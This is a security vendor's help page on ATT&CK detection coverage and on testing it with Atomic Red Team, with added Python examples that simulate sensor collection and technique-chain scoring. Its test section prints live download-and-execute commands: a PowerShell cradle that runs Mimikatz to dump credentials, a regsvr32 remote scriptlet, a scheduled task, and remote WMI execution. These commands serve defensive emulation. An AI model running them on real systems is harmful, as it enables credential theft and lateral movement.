Building a great security operations program depends on layering the right detection techniques and security products to cover the appropriate number of adversary techniques for your business. This has historically been very difficult because most security products take a black box approach that does not transparently explain what techniques are covered.
We strive to make Red Canary’s coverage of adversary techniques both transparent and understandable so you can ensure your program is investing in the right security solutions.
Understanding coverage for an adversary technique
You can view an adversary technique in your Red Canary portal, along with detection analytics we used to identify that technique, how often it is used across all systems we monitor, and how prevalent it is in your environment.
To view Red Canary’s detection coverage for an adversary technique:
- Click Analytics & Intelligence in the site navigation.
- Click the Attack Techniques tab to see a matrix of all adversary techniques.
- Click on the name of any adversary technique.
- Review the Red Canary Coverage section to see a list of the active detection analytics that Red Canary uses to identify behavior associated with this technique. You can click any analytic name to read more about it.
Coverage differences between EDR/EPP platforms
No two EDR/EPP products collect exactly the same amount of telemetry under the same conditions. Some are designed to collect mostly unfiltered activity with little targeting or filtering performed on the endpoint. Others take an “opt-in” approach and collect significantly less data. Features that reduce the amount of data collected by your sensor include:
- Deduplication, wherein a sensor decides not to record endpoint activity because it has already reported the same or a similar event in a recent time window (ranging from minutes to days).
- Capping/Limiting, wherein a sensor is configured to record a maximum number of records (oftentimes per process path, binary, etc.) per time window (ranging from minutes to days).
- Targeting, wherein a sensor collects information only under certain conditions or circumstances, such as:
- Recording registry modifications only for specific registry keys/paths
- Recording file modifications only for specific non-system paths
- Recording binary information for only non-Microsoft signed binaries
These differences in telemetry collection make it impossible for us to concretely tell you that your specific EDR/EPP platform collects the data needed to enable a specific detection analytic.
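To make the effect of these collection features concrete, the following added example (Python; not Red Canary's code and not a model of any particular vendor's sensor) replays one constructed endpoint trace through three simulated sensor profiles and counts how often a simple constructed analytic fires. The event trace, the sensor profiles, the analytic and the placeholder URL are all assumptions made for illustration; the "targeted" profile treats "record binary information only for non-Microsoft-signed binaries" as dropping process events for Microsoft-signed images, which is a deliberate simplification.

```python
"""Added example (not Red Canary's code): simulate how deduplication, capping
and targeting change what a detection analytic can observe. The event trace,
sensor profiles and analytic are constructed for illustration only."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    ts: int             # seconds since the start of the constructed trace
    event_type: str     # "process", "registry" or "file"
    path: str           # image path, registry key or file path
    signer: str = ""    # code signer, for process events
    cmdline: str = ""   # command line, for process events


@dataclass
class SensorProfile:
    """Knobs modelling the vendor behaviours described in the text."""
    name: str
    dedup_window: int = 0            # seconds; 0 disables deduplication
    cap_per_path: int = 0            # max events per path per cap_window; 0 = unlimited
    cap_window: int = 0
    microsoft_signed: bool = True    # False: only non-Microsoft-signed binaries are recorded
    registry_prefixes: tuple = ()    # empty: record every registry modification


def collect(profile, events):
    """Return the subset of events this sensor profile would report upstream."""
    kept = []
    last_seen = {}                 # dedup: (type, path, cmdline) -> last reported ts
    reported = defaultdict(list)   # capping: path -> timestamps already reported
    for ev in sorted(events, key=lambda e: e.ts):
        # Targeting: whole classes of activity are never recorded at all.
        if (ev.event_type == "process" and not profile.microsoft_signed
                and ev.signer == "Microsoft Windows"):
            continue
        if (ev.event_type == "registry" and profile.registry_prefixes
                and not ev.path.startswith(profile.registry_prefixes)):
            continue
        # Deduplication: an identical event inside the window is not re-reported.
        if profile.dedup_window:
            key = (ev.event_type, ev.path, ev.cmdline)
            prev = last_seen.get(key)
            if prev is not None and ev.ts - prev < profile.dedup_window:
                continue
            last_seen[key] = ev.ts
        # Capping: at most N events per path inside the cap window.
        if profile.cap_per_path:
            recent = [t for t in reported[ev.path] if ev.ts - t < profile.cap_window]
            if len(recent) >= profile.cap_per_path:
                continue
            reported[ev.path] = recent + [ev.ts]
        kept.append(ev)
    return kept


def analytic_regsvr32_remote_scriptlet(events):
    """Constructed analytic: regsvr32.exe launched with /i: pointing at a URL
    (the behaviour the T1117 test later on this page exercises)."""
    return [ev for ev in events
            if ev.event_type == "process"
            and ev.path.lower().endswith("regsvr32.exe")
            and "/i:http" in ev.cmdline.lower()]


# Constructed trace: the same regsvr32 command line runs twice within a minute,
# surrounded by unrelated noise. The URL is a placeholder, not a page URL.
REGSVR_CMD = "regsvr32.exe /s /u /i:https://example.invalid/test.sct scrobj.dll"
TRACE = [
    Event(0, "process", r"C:\Windows\System32\svchost.exe", "Microsoft Windows", "svchost.exe -k netsvcs"),
    Event(5, "process", r"C:\Windows\System32\regsvr32.exe", "Microsoft Windows", REGSVR_CMD),
    Event(6, "registry", r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater"),
    Event(7, "registry", r"HKCU\Software\ExampleApp\LastRun"),
    Event(8, "process", r"C:\Windows\System32\calc.exe", "Microsoft Windows", "calc.exe"),
    Event(9, "process", r"C:\Program Files\Vendor\agent.exe", "Example Vendor", "agent.exe --heartbeat"),
    Event(40, "process", r"C:\Windows\System32\regsvr32.exe", "Microsoft Windows", REGSVR_CMD),
]

PROFILES = [
    SensorProfile("unfiltered"),
    SensorProfile("dedup-and-cap", dedup_window=60, cap_per_path=3, cap_window=3600),
    SensorProfile("targeted", microsoft_signed=False,
                  registry_prefixes=(r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",)),
]


def coverage_report(profiles=PROFILES, trace=TRACE):
    """Map profile name -> (events reported, analytic hits) for the trace."""
    out = {}
    for p in profiles:
        seen = collect(p, trace)
        out[p.name] = (len(seen), len(analytic_regsvr32_remote_scriptlet(seen)))
    return out


if __name__ == "__main__":
    for name, (reported, hits) in coverage_report().items():
        print(f"{name:14s} reported={reported} analytic_hits={hits}")
```

The unfiltered profile reports all seven events and the analytic fires twice; the deduplicating profile suppresses the repeated regsvr32 launch so the analytic fires once; the targeted profile never emits a process event for the Microsoft-signed regsvr32.exe at all, so the same analytic fires zero times even though the behaviour occurred. That last case is exactly why a vendor's collection policy, not only the analytic, decides whether a technique is covered on a given platform.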
We continually and strongly advise EDR/EPP vendors to increase their telemetry collection. We also ensure they meet our quality standards through a thorough telemetry collection validation process that we run for each product. Products must collect a certain amount of telemetry before we will consider supporting them (this is why we support only a small number of the EDR/EPP platforms on the market; most do not pass this step).
Techniques Red Canary does not cover
There are adversary techniques that Red Canary does not have coverage for. This lack of coverage can be for a number of reasons:
- EDR products do not provide the data required to observe this technique (for example, Supply Chain Compromise (T1195)).
- Some techniques are overly broad and more appropriate for visibility use cases than detection use cases (for example, the File Deletion (T1107) technique is not specific and thus is not well suited for detection purposes).
- Red Canary has not prioritized the detection of this technique. This rarely, if ever, happens; it is generally limited to circumstances in which a new technique has been added to ATT&CK that has not yet been seen in the wild and detection approaches are still being researched.
Learning more about Red Canary coverage
Red Canary’s detection engineering and intelligence teams always welcome conversations about detection coverage. If you have questions about our coverage for a specific technique, for classes of techniques, or simply want to chat more about this topic, please don’t hesitate to reach out and we’ll set up a call between our teams.
Testing an adversary technique
You can test an adversary technique to assess Red Canary detection coverage, your automation playbooks, and your team’s response to the resulting confirmed threats.
You can test an adversary technique in a number of ways, using paid or open source tools, simple command executions, etc. For teams looking to start testing quickly and easily, Atomic Red Team is an open source library of simple tests that any security team can execute to test their defenses. Tests are focused, have few dependencies, and are defined in a structured format that can be used by automation frameworks.
To simulate an adversary technique and test Red Canary’s detection coverage using Atomic Red Team:
- Read the Atomic Red Team getting started guide.
- Select a test.
- Execute that test.
- Review the events identified and investigated by Red Canary and any confirmed threats that result.
Selecting tests to exercise
Testing begins with selecting the right adversary techniques to simulate. It is important that you execute actions like an adversary would (a common mistake is to run a single command, like listing local user accounts, without the follow-on commands that an adversary would take).
Following are several examples our customers have used during recent tests:
Good tests for Windows endpoints
ATT&CK Technique T1053 - Scheduled Task (Privilege Escalation, Execution, and Persistence)
Running the command below exercises the tactics listed above. The scheduled task uses regsvr32.exe to pull a (safe) file down from the Atomic Red Team repository and execute it.
SCHTASKS /Create /SC ONCE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/8e969def85345af3d509210555318e9b73729d7f/atomics/T1117/src/RegSvr32.sct scrobj.dll" /mo 30
ATT&CK Technique T1003 - Credential Dumping (Credential Access)
Running the command below uses PowerShell to download Mimikatz from the Empire repository and execute it.
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
ATT&CK Technique T1047 - Windows Management Instrumentation (Lateral Movement, Execution, and Discovery)
Run the command below from a test machine, replacing REMOTECOMPUTERNAME with the hostname or IP address of another remote system that you’d like to test. The command uses WMI to spawn PowerShell on the remote computer, pull down a benign discovery script from our Atomic Red Team GitHub repository, and execute it. This simulates lateral movement and reconnaissance.
wmic /node:REMOTECOMPUTERNAME process call create "powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat') > $env:temp\output.txt"
ATT&CK Technique T1117 - Regsvr32.exe (Execution)
Running the command below uses regsvr32.exe to download a (safe) file from the Atomic Red Team repository. The file is then executed, which spawns calc.exe.
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/8e969def85345af3d509210555318e9b73729d7f/atomics/T1117/src/RegSvr32.sct scrobj.dll
ATT&CK Technique T1086 - PowerShell (Execution, Discovery)
Running the command below downloads a discovery batch file and executes it. The discovery file uses safe, native Windows commands to collect system information and writes the output to a text file.
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > output.txt
Good tests for Linux endpoints
Rocke & Roll
This chain reaction executes multiple commands that simulate the behaviors of a multi-stage “Rocke & Roll” attack. This includes the use of the following techniques:
- T1027 - Obfuscated Files or Information
- T1222 - File Permission Modification
- T1107 - File Deletion
- T1057 - Process Discovery
- T1049 - System Network Connections Discovery
- T1036 - Masquerading
- T1168 - Local Job Scheduling
- T1099 - Timestomp
Download and execute the following script: rocke-and-roll-stage-01.sh
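The advice under "Selecting tests to exercise" (run the follow-on commands an adversary would, not a single isolated command) and the multi-technique Linux chain above both come down to the same detection idea: a sequence of related behaviours on one host is far more significant than any one of them. The following added example (Python; not Red Canary's or Atomic Red Team's code) tags constructed process events with the ATT&CK technique IDs named on this page and scores each host by how many distinct techniques appear within a time window. The tagging regexes, the host names, the parent/child relationships, the window and threshold, and the placeholder URLs are all assumptions made for illustration, not a published analytic.

```python
"""Added example (not Red Canary's or Atomic Red Team's code): tag constructed
process events with technique IDs from this page and score each host by the
number of distinct techniques observed inside a time window. A lone command
scores low; a chain of follow-on commands scores high."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    ts: int         # seconds since the start of the constructed trace
    host: str
    parent: str     # parent image name
    cmdline: str


# Constructed tagging heuristics: (technique ID from this page, regex over the
# command line). The patterns are illustrative, not a complete rule set.
RULES = [
    ("T1086", re.compile(r"powershell(\.exe)?\b.*downloadstring", re.I)),
    ("T1047", re.compile(r"^wmic\b.*process call create", re.I)),
    ("T1053", re.compile(r"^schtasks(\.exe)?\b.*/create", re.I)),
    ("T1117", re.compile(r"regsvr32(\.exe)?\b.*/i:https?://", re.I)),
    ("T1222", re.compile(r"^chmod\b", re.I)),
    ("T1168", re.compile(r"^crontab\b|/etc/cron", re.I)),
    ("T1057", re.compile(r"^ps\b", re.I)),
    ("T1049", re.compile(r"^(netstat|ss)\b", re.I)),
    ("T1107", re.compile(r"^rm\b", re.I)),
]
# On the target of a WMI lateral-movement test the signal is the parent process,
# not the command line: the child is spawned by the WMI provider host.
PARENT_RULES = [
    ("T1047", re.compile(r"^wmiprvse\.exe$", re.I)),
]


def tag(ev):
    """Return the set of technique IDs a single event matches."""
    techs = {tid for tid, rx in RULES if rx.search(ev.cmdline)}
    techs |= {tid for tid, rx in PARENT_RULES if rx.search(ev.parent)}
    return techs


def chain_score(events, window=300, min_distinct=3):
    """Per host: the largest set of distinct techniques seen in any span of
    `window` seconds, and whether it meets the alerting threshold."""
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        techs = tag(ev)
        if techs:
            by_host[ev.host].append((ev.ts, techs))
    result = {}
    for host, tagged in by_host.items():
        best = set()
        for i, (t0, _) in enumerate(tagged):
            span = set()
            for ts, techs in tagged[i:]:
                if ts - t0 > window:
                    break
                span |= techs
            if len(span) > len(best):
                best = span
        result[host] = {"techniques": sorted(best), "alert": len(best) >= min_distinct}
    return result


# Constructed trace. URLs are placeholders, not the page's test URLs.
CRADLE = "powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/discovery.bat')"
TRACE = [
    # hostA: the "single command" mistake from the text: one discovery command, nothing else.
    ProcEvent(0, "hostA", "bash", "ps aux"),
    # hostB: target side of a WMI test, followed by scheduled-task and regsvr32 tests.
    ProcEvent(10, "hostB", "wmiprvse.exe", CRADLE),
    ProcEvent(12, "hostB", "powershell.exe", "schtasks.exe /Create /SC ONCE /TN Test /TR regsvr32.exe"),
    ProcEvent(15, "hostB", "powershell.exe", "regsvr32.exe /s /u /i:https://example.invalid/test.sct scrobj.dll"),
    # hostC: a Linux chain touching several of the techniques listed above.
    ProcEvent(100, "hostC", "bash", "chmod +x /tmp/stage"),
    ProcEvent(101, "hostC", "bash", "ps aux"),
    ProcEvent(102, "hostC", "bash", "netstat -antp"),
    ProcEvent(103, "hostC", "bash", "crontab -l"),
    ProcEvent(104, "hostC", "bash", "rm -f /tmp/stage"),
    # hostD: similar commands spread over hours, so no window links them.
    ProcEvent(1000, "hostD", "bash", "ps aux"),
    ProcEvent(5000, "hostD", "bash", "netstat -antp"),
    ProcEvent(9000, "hostD", "bash", "rm -f /tmp/old.log"),
    # hostE: source side of the WMI test; only the originating command is visible here.
    ProcEvent(10, "hostE", "cmd.exe", 'wmic /node:hostB process call create "' + CRADLE + '"'),
]


if __name__ == "__main__":
    for host, info in chain_score(TRACE).items():
        print(f"{host}: alert={info['alert']} techniques={info['techniques']}")
```

Only hostB and hostC cross the threshold. hostA and hostD show why a single command, or the same commands spread across hours, is a poor test of detection coverage: the tagging works, but nothing links the events into a chain. hostE shows that the source and target of a lateral-movement test produce different telemetry, so both hosts need to be checked when you review which events were identified.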